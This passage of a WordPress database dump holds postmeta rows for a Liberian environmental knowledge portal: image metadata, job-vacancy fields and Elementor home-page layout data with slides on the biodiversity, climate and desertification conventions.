jpg\";s:5:\"width\";i:370;s:6:\"height\";i:500;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:39615;}s:14:\"kava-thumb-m-2\";a:5:{s:4:\"file\";s:22:\"today-new1-570x450.jpg\";s:5:\"width\";i:570;s:6:\"height\";i:450;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:55617;}s:12:\"kava-thumb-l\";a:5:{s:4:\"file\";s:23:\"today-new1-1170x650.jpg\";s:5:\"width\";i:1170;s:6:\"height\";i:650;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:138025;}s:13:\"kava-thumb-xl\";a:5:{s:4:\"file\";s:24:\"today-new1-1920x1080.jpg\";s:5:\"width\";i:1920;s:6:\"height\";i:1080;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:306796;}s:18:\"kava-thumb-masonry\";a:5:{s:4:\"file\";s:22:\"today-new1-600x450.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:450;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:57098;}s:18:\"kava-thumb-justify\";a:5:{s:4:\"file\";s:22:\"today-new1-640x640.jpg\";s:5:\"width\";i:640;s:6:\"height\";i:640;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:79260;}s:20:\"kava-thumb-justify-2\";a:5:{s:4:\"file\";s:23:\"today-new1-1280x640.jpg\";s:5:\"width\";i:1280;s:6:\"height\";i:640;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:146835;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(38710,5816,'_edit_lock','1773134813:38'),(38711,5816,'_last_editor_used_jetpack','block-editor'),(38855,5844,'_last_editor_used_jetpack','block-editor'),(38713,5818,'_wp_attached_file','2026/03/today-new1.jpg'),(38708,5814,'_wp_attachment_metadata','a:1:{s:8:\"filesize\";i:74359;}'),(38709,5812,'_wp_old_date','2026-03-10'),(38698,5803,'_wp_old_date','2026-03-09'),(38699,5799,'_wp_old_date','2026-03-09'),(38700,5812,'_last_editor_used_jetpack','classic-editor'),(38701,5812,'_edit_lock','1774624719:38'),(38702,5812,'_edit_last','38'),(38703,5812,'_wp_page_template','default'),(38704,5812,'closed_date','2026-04-02'),(38705,5812,'owner','EPA'),(38706,5812,'vacancy_link',''),(38707,5814,'_wp_attached_file','2026/03/Stakeholder-Gender-and-Social-Inclusion-Expert-1.docx'),(38693,5809,'_wp_attached_file','2026/03/Environmental-Expert.pdf'),(38694,5809,'_wp_attachment_metadata','a:1:{s:8:\"filesize\";i:171020;}'),(38695,5811,'_edit_lock','1773058687:38'),(38696,5811,'_last_editor_used_jetpack','block-editor'),(38697,5807,'_wp_old_date','2026-03-09'),(38687,5807,'_edit_lock','1773086351:38'),(38688,5807,'_edit_last','38'),(38689,5807,'_wp_page_template','default'),(38690,5807,'closed_date','2026-03-19'),(38691,5807,'owner','EPA'),(38692,5807,'vacancy_link',''),(38685,5805,'_wp_attachment_metadata','a:1:{s:8:\"filesize\";i:154807;}'),(38686,5807,'_last_editor_used_jetpack','classic-editor'),(35297,5173,'_wp_page_template','default'),(35298,5173,'_elementor_edit_mode','builder'),(35299,5173,'_elementor_data','[{\"id\":\"c41f68d\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"gap\":\"no\",\"stretch_section\":\"section-stretched\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"0aa7a91\"}],\"margin\":{\"unit\":\"px\",\"top\":\"-30\",\"right\":0,\"bottom\":\"30\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"0b8df2e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"2ff14bc\",\"elType\":\"widget\",\"settings\":{\"slides\":[{\"heading\":\"Convention on Biological Diversity \",\"description\":\"CBD is dedicated to promoting sustainable development\",\"button_text\":\"Read More\",\"background_color\":\"\",\"_id\":\"ef41cbd\",\"horizontal_position\":\"center\",\"vertical_position\":\"middle\",\"background_image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/featured_cbd.jpg\",\"id\":531,\"alt\":\"\",\"source\":\"library\"},\"background_ken_burns\":\"yes\",\"zoom_direction\":\"out\",\"background_overlay\":\"yes\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/mea-resource\\/united-nations-convention-on-biological-diversity\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"link_click\":\"button\"},{\"heading\":\"Convention on Climate Change\",\"description\":\"The ultimate objective of the Convention is to stabilize greenhouse gas concentrations \\\"at a level that would prevent dangerous anthropogenic (human induced) interference with the climate system.\\\"\",\"button_text\":\"Read More\",\"background_color\":\"\",\"_id\":\"11d0065\",\"background_image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/featured_marine.jpg\",\"id\":2158,\"alt\":\"\",\"source\":\"library\"},\"background_ken_burns\":\"yes\",\"zoom_direction\":\"out\",\"background_overlay\":\"yes\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/mea-resource\\/united-nations-framework-convention-on-climate-change\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"link_click\":\"button\"},{\"heading\":\"Convention to Combat Desertification\",\"description\":\"A sole legally binding international agreement linking environment and development to sustainable land management.\",\"button_text\":\"Read More\",\"background_color\":\"\",\"_id\":\"3d86158\",\"background_image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/slide_ccd.jpg\",\"id\":14,\"alt\":\"\",\"source\":\"library\"},\"background_ken_burns\":\"yes\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/mea-resource\\/united-nations-convention-to-combat-desertification\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"link_click\":\"button\"}],\"slides_height\":{\"unit\":\"px\",\"size\":370,\"sizes\":[]},\"content_animation\":\"fadeInLeft\"},\"elements\":[],\"widgetType\":\"slides\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"3832980\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"height\":\"min-height\",\"custom_height\":{\"unit\":\"px\",\"size\":120,\"sizes\":[]},\"stretch_section\":\"section-stretched\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"8ce7e10\"}],\"background_background\":\"classic\",\"background_color\":\"#0A3C1173\",\"margin\":{\"unit\":\"px\",\"top\":\"-30\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"f8bb5a9\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"db42395\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"a3ddb70\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"ecc2093\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":12.2370000000000000994759830064140260219573974609375},\"elements\":[],\"isInner\":true},{\"id\":\"73e3c60\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":77.0799999999999982946974341757595539093017578125},\"elements\":[{\"id\":\"f4a4a39\",\"elType\":\"widget\",\"settings\":{\"search_placeholder_text\":\"Search Knowledge Resources...\",\"show_search_category_list\":\"yes\",\"search_category_select_placeholder\":\"Entire Resource\",\"results_counter_text\":\"Results\",\"full_results_btn_text\":\"See all results\",\"title_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"c6a37ad\",\"meta_format\":\"%s\",\"date_format\":\"F j, Y\"}],\"content_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"c698fbe\",\"meta_format\":\"%s\",\"date_format\":\"F j, Y\"}],\"negative_search\":\"Sorry, but nothing matched your search terms.\",\"server_error\":\"Sorry, but we cannot handle your search query now. Please, try again later!\",\"search_submit_bg_color\":\"rgba(0,100,0,0.86)\",\"search_category_color\":\"#000000\",\"search_taxonomy\":\"resource_category\",\"search_source\":[\"document\",\"institution\",\"mea_resource\",\"project_resource\",\"related_topic\"]},\"elements\":[],\"widgetType\":\"jet-ajax-search\"}],\"isInner\":true},{\"id\":\"e733e70\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":10.3469999999999995310417943983338773250579833984375},\"elements\":[],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"3b467af\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"4a9f59c\"}],\"padding\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"0\",\"bottom\":\"40\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"fb58b71\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"f8f4095\",\"elType\":\"widget\",\"settings\":{\"title\":\"Select a Topic\",\"header_size\":\"h1\",\"align\":\"center\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":35,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"62059d5\",\"elType\":\"widget\",\"settings\":{\"style\":\"dotted\",\"width\":{\"unit\":\"%\",\"size\":10,\"sizes\":[]},\"align\":\"center\",\"text\":\"Divider\",\"color\":\"#54595f\",\"weight\":{\"unit\":\"px\",\"size\":7,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"divider\"},{\"id\":\"cc6fadf\",\"elType\":\"widget\",\"settings\":{\"min_height\":{\"unit\":\"px\",\"size\":450,\"sizes\":[]},\"show_terms\":\"\",\"show_terms_num\":\"2\",\"excerpt_length\":\"\",\"excerpt_trimmed_ending\":\"...\",\"show_date\":\"\",\"post_type\":\"related_topic\",\"custom_query_by\":\"ids\",\"post_ids\":\"468,470,473,474,487\",\"title_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"5b2266b\",\"meta_format\":\"%s\",\"date_format\":\"F j, Y\"}],\"content_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"76431bc\",\"meta_format\":\"%s\",\"date_format\":\"F j, Y\"}],\"boxes_gap\":{\"unit\":\"px\",\"size\":5,\"sizes\":[]},\"boxes_title_color\":\"#ffffff\",\"boxes_title_color_hover\":\"#006400\",\"boxes_title_typography_typography\":\"custom\",\"boxes_title_typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"boxes_title_typography_font_weight\":\"900\",\"boxes_title_alignment\":\"left\"},\"elements\":[],\"widgetType\":\"jet-blog-smart-tiles\"},{\"id\":\"724fd77\",\"elType\":\"widget\",\"settings\":{\"text\":\"Explore All Topics\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/related-topics\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"center\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_text_transform\":\"uppercase\",\"button_text_color\":\"#ffffff\",\"background_color\":\"#006400\",\"hover_color\":\"#ffffff\",\"button_background_hover_color\":\"#014421\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"89e8d8c\",\"elType\":\"section\",\"settings\":{\"stretch_section\":\"section-stretched\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"0fea759\"}],\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/home_4.jpg\",\"id\":258},\"background_position\":\"center center\",\"background_attachment\":\"fixed\",\"background_size\":\"cover\",\"padding\":{\"unit\":\"px\",\"top\":\"70\",\"right\":\"0\",\"bottom\":\"70\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"5c4a65b\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"100\",\"bottom\":\"0\",\"left\":\"150\",\"isLinked\":false}},\"elements\":[{\"id\":\"b82855d\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"45201a0\"}],\"reverse_order_tablet\":\"reverse-tablet\",\"reverse_order_mobile\":\"reverse-mobile\",\"hide_mobile\":\"hidden-phone\"},\"elements\":[{\"id\":\"9b26f8f\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"15\",\"bottom\":\"0\",\"left\":\"15\",\"isLinked\":false}},\"elements\":[{\"id\":\"8d9d9b1\",\"elType\":\"widget\",\"settings\":{\"title\":\"Explore by Institution\",\"title_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":50,\"sizes\":[]},\"typography_font_weight\":\"600\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"7448ecc\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Explore Government and partner Institutions that have direct linkages with environmental policies and development.<\\/p>\",\"text_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]},\"typography_font_weight\":\"500\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"cdd4f69\",\"elType\":\"widget\",\"settings\":{\"text\":\"Explore By Insitution\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/institutions-resources\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"left\",\"selected_icon\":{\"value\":\"fas fa-long-arrow-alt-right\",\"library\":\"fa-solid\"},\"icon_align\":\"right\",\"icon_indent\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_text_transform\":\"uppercase\",\"button_text_color\":\"#ffffff\",\"background_color\":\"#006400\",\"hover_color\":\"#ffffff\",\"button_background_hover_color\":\"#014421\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"a2777f6\",\"elType\":\"section\",\"settings\":{\"stretch_section\":\"section-stretched\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"0fea759\"}],\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/featured_land_climate.jpg\",\"id\":493},\"background_position\":\"center center\",\"background_attachment\":\"fixed\",\"background_size\":\"cover\",\"padding\":{\"unit\":\"px\",\"top\":\"70\",\"right\":\"0\",\"bottom\":\"70\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"cc16d03\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"100\",\"bottom\":\"0\",\"left\":\"150\",\"isLinked\":false}},\"elements\":[{\"id\":\"b4fc23b\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"45201a0\"}]},\"elements\":[{\"id\":\"f419151\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"15\",\"bottom\":\"0\",\"left\":\"15\",\"isLinked\":false}},\"elements\":[{\"id\":\"99692db\",\"elType\":\"widget\",\"settings\":{\"title\":\"Explore by Document\",\"title_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":50,\"sizes\":[]},\"typography_font_weight\":\"600\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"f7b0473\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Explore the EKMS Documents Database.<\\/p>\",\"text_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]},\"typography_font_weight\":\"500\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"259a529\",\"elType\":\"widget\",\"settings\":{\"text\":\"Explore All Documents\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/document-library\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"left\",\"selected_icon\":{\"value\":\"fas fa-long-arrow-alt-right\",\"library\":\"fa-solid\"},\"icon_align\":\"right\",\"icon_indent\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_text_transform\":\"uppercase\",\"button_text_color\":\"#ffffff\",\"background_color\":\"#006400\",\"hover_color\":\"#ffffff\",\"button_background_hover_color\":\"#014421\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"8aa33ed\",\"elType\":\"section\",\"settings\":{\"stretch_section\":\"section-stretched\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"db429d4\"}],\"background_background\":\"classic\",\"shape_divider_bottom_width\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"shape_divider_bottom_height\":{\"unit\":\"px\",\"size\":82,\"sizes\":[]},\"shape_divider_bottom_flip\":\"yes\",\"padding\":{\"unit\":\"px\",\"top\":\"50\",\"right\":\"0\",\"bottom\":\"50\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"5a37cd7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"df23907\",\"elType\":\"widget\",\"settings\":{\"title\":\"Latest News & Blogs\",\"header_size\":\"h1\",\"align\":\"center\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":35,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"339607e\",\"elType\":\"widget\",\"settings\":{\"style\":\"dotted\",\"width\":{\"unit\":\"%\",\"size\":10,\"sizes\":[]},\"align\":\"center\",\"text\":\"Divider\",\"color\":\"#54595f\",\"weight\":{\"unit\":\"px\",\"size\":7,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"divider\"},{\"id\":\"684051a\",\"elType\":\"widget\",\"settings\":{\"number\":4,\"columns\":\"4\",\"equal_height_cols\":\"true\",\"title_trimmed\":\"yes\",\"title_length\":10,\"title_trimmed_ending_text\":\"...\",\"excerpt_length\":10,\"show_terms\":\"yes\",\"show_meta\":\"\",\"show_more\":\"\",\"more_text\":\"Read More\",\"title_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"537281f\",\"meta_format\":\"%s\",\"date_format\":\"F j, Y\"}],\"content_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"821cf97\",\"meta_format\":\"%s\",\"date_format\":\"F j, Y\"}],\"content_bg\":\"rgba(0,100,0,0.59)\",\"content_padding\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"15\",\"isLinked\":false},\"title_color\":\"#ffffff\",\"title_typography_typography\":\"custom\",\"title_typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"title_typography_font_weight\":\"900\",\"excerpt_color\":\"rgba(255,255,255,0.75)\",\"excerpt_typography_typography\":\"custom\",\"excerpt_typography_font_size\":{\"unit\":\"px\",\"size\":13,\"sizes\":[]},\"terms_link_typography_typography\":\"custom\",\"terms_link_typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]},\"terms_link_bg_color\":\"#6ec1e4\",\"show_author\":\"\",\"show_comments\":\"\",\"arrows\":\"\",\"autoplay\":\"\",\"infinite\":\"\",\"meta_title_related_position\":\"after\",\"meta_content_related_position\":\"after\",\"title_color_hover\":\"#000000\"},\"elements\":[],\"widgetType\":\"jet-posts\"},{\"id\":\"c151e2c\",\"elType\":\"widget\",\"settings\":{\"text\":\"Read All News & Blogs\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/news-and-blogs\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"center\",\"selected_icon\":{\"value\":\"fas fa-long-arrow-alt-right\",\"library\":\"fa-solid\"},\"icon_align\":\"right\",\"icon_indent\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_text_transform\":\"uppercase\",\"button_text_color\":\"#ffffff\",\"background_color\":\"#006400\",\"hover_color\":\"#ffffff\",\"button_background_hover_color\":\"#014421\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false}]'),(35300,5173,'_elementor_version','3.4.3'),(35301,5173,'_elementor_template_type','wp-page'),(35302,5173,'_elementor_page_settings','a:1:{s:21:\"background_background\";s:7:\"classic\";}'),(35304,5173,'_elementor_pro_version','3.3.6'),(35305,5174,'_wp_page_template','default'),(35306,5174,'_elementor_edit_mode','builder'),(35307,5174,'_elementor_data','[{\"id\":\"c41f68d\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"gap\":\"no\",\"stretch_section\":\"section-stretched\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"0aa7a91\"}],\"margin\":{\"unit\":\"px\",\"top\":\"-30\",\"right\":0,\"bottom\":\"30\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"0b8df2e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"2ff14bc\",\"elType\":\"widget\",\"settings\":{\"slides\":[{\"heading\":\"Convention on Biological Diversity \",\"description\":\"CBD is dedicated to promoting sustainable development\",\"button_text\":\"Read More\",\"background_color\":\"\",\"_id\":\"ef41cbd\",\"horizontal_position\":\"center\",\"vertical_position\":\"middle\",\"background_image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/featured_cbd.jpg\",\"id\":531,\"alt\":\"\",\"source\":\"library\"},\"background_ken_burns\":\"yes\",\"zoom_direction\":\"out\",\"background_overlay\":\"yes\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/mea-resource\\/united-nations-convention-on-biological-diversity\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"link_click\":\"button\"},{\"heading\":\"Convention on Climate Change\",\"description\":\"The ultimate objective of the Convention is to stabilize greenhouse gas concentrations \\\"at a level that would prevent dangerous anthropogenic (human induced) interference with the climate system.\\\"\",\"button_text\":\"Read More\",\"background_color\":\"\",\"_id\":\"11d0065\",\"background_image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/featured_marine.jpg\",\"id\":2158,\"alt\":\"\",\"source\":\"library\"},\"background_ken_burns\":\"yes\",\"zoom_direction\":\"out\",\"background_overlay\":\"yes\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/mea-resource\\/united-nations-framework-convention-on-climate-change\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"link_click\":\"button\"},{\"heading\":\"Convention to Combat Desertification\",\"description\":\"A sole legally binding international agreement linking environment and development to sustainable land management.\",\"button_text\":\"Read More\",\"background_color\":\"\",\"_id\":\"3d86158\",\"background_image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/slide_ccd.jpg\",\"id\":14,\"alt\":\"\",\"source\":\"library\"},\"background_ken_burns\":\"yes\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/mea-resource\\/united-nations-convention-to-combat-desertification\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"link_click\":\"button\"}],\"slides_height\":{\"unit\":\"px\",\"size\":370,\"sizes\":[]},\"content_animation\":\"fadeInLeft\"},\"elements\":[],\"widgetType\":\"slides\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"3832980\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"height\":\"min-height\",\"custom_height\":{\"unit\":\"px\",\"size\":120,\"sizes\":[]},\"stretch_section\":\"section-stretched\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"8ce7e10\"}],\"background_background\":\"classic\",\"background_color\":\"#0A3C1173\",\"margin\":{\"unit\":\"px\",\"top\":\"-30\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"f8bb5a9\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"db42395\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"a3ddb70\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"ecc2093\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":12.2370000000000000994759830064140260219573974609375},\"elements\":[],\"isInner\":true},{\"id\":\"73e3c60\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":77.0799999999999982946974341757595539093017578125},\"elements\":[{\"id\":\"f4a4a39\",\"elType\":\"widget\",\"settings\":{\"search_placeholder_text\":\"Search Knowledge Resources...\",\"show_search_category_list\":\"yes\",\"search_category_select_placeholder\":\"Entire Resource\",\"results_counter_text\":\"Results\",\"full_results_btn_text\":\"See all results\",\"title_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"c6a37ad\",\"meta_format\":\"%s\",\"date_format\":\"F j, Y\"}],\"content_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"c698fbe\",\"meta_format\":\"%s\",\"date_format\":\"F j, Y\"}],\"negative_search\":\"Sorry, but nothing matched your search terms.\",\"server_error\":\"Sorry, but we cannot handle your search query now. Please, try again later!\",\"search_submit_bg_color\":\"rgba(0,100,0,0.86)\",\"search_category_color\":\"#000000\",\"search_taxonomy\":\"resource_category\",\"search_source\":[\"document\",\"institution\",\"mea_resource\",\"project_resource\",\"related_topic\"]},\"elements\":[],\"widgetType\":\"jet-ajax-search\"}],\"isInner\":true},{\"id\":\"e733e70\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":10.3469999999999995310417943983338773250579833984375},\"elements\":[],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"3b467af\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"4a9f59c\"}],\"padding\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"0\",\"bottom\":\"40\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"fb58b71\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"f8f4095\",\"elType\":\"widget\",\"settings\":{\"title\":\"Select a Topic\",\"header_size\":\"h1\",\"align\":\"center\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":35,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"62059d5\",\"elType\":\"widget\",\"settings\":{\"style\":\"dotted\",\"width\":{\"unit\":\"%\",\"size\":10,\"sizes\":[]},\"align\":\"center\",\"text\":\"Divider\",\"color\":\"#54595f\",\"weight\":{\"unit\":\"px\",\"size\":7,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"divider\"},{\"id\":\"cc6fadf\",\"elType\":\"widget\",\"settings\":{\"min_height\":{\"unit\":\"px\",\"size\":450,\"sizes\":[]},\"show_terms\":\"\",\"show_terms_num\":\"2\",\"excerpt_length\":\"\",\"excerpt_trimmed_ending\":\"...\",\"show_date\":\"\",\"post_type\":\"related_topic\",\"custom_query_by\":\"ids\",\"post_ids\":\"468,470,473,474,487\",\"title_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"5b2266b\",\"meta_format\":\"%s\",\"date_format\":\"F j, Y\"}],\"content_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"76431bc\",\"meta_format\":\"%s\",\"date_format\":\"F j, 